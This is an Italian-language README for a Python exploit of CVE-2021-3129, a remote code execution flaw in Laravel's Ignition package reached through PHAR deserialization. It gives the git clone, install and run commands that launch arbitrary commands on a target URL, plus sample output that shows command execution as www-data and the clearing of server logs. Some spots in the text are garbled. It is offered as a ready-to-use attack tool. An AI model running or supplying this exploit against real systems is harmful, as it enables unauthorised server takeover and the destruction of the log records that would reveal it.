
Exploit Python per CVE-2021-3129 che automatizza la deserializzazione PHAR per eseguire comandi arbitrari su endpoint Laravel Ignition vulnerabili.
Questo è uno script di exploit Python per CVE-2021-3129, una vulnerabilità di esecuzione remota di codice in Laravel quando il pacchetto Ignition è installato. Questa vulnerabilità consente a un attaccante di eseguire comandi di sistema arbitrari tramite deserializzazione PHAR.
phpggcid, whoami, ecc.)requestsClona il repository:
git clone https://github.com/0x0d3ad/CVE-2021-3129.git
cd CVE-2021-3129
Installa i pacchetti Python richiesti:
pip install requests
Esegui lo script con il target e il comando desiderati:
python3 CVE-2021-3129.py http://example.com --cmd 'id'
Esempio di output:
[+] Generating PHAR payload for command: id
[+] Trying to clear logs
[+] Logs cleared
[+] Convert log file to PHAR
[+] Successfully converted logs to PHAR
[+] PHAR deserialized
---------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
---------------------------------------
[+] Trying to clear logs
[+] Logs cleared
target (obbligatorio): L'URL dell'applicazione Laravel vulnerabile.--cmd (opzionale): Il comando da eseguire sul target (default: whoami).--log_path (opzionale): Il percorso del file di log da usare (default: ../storage/logs/laravel.log).
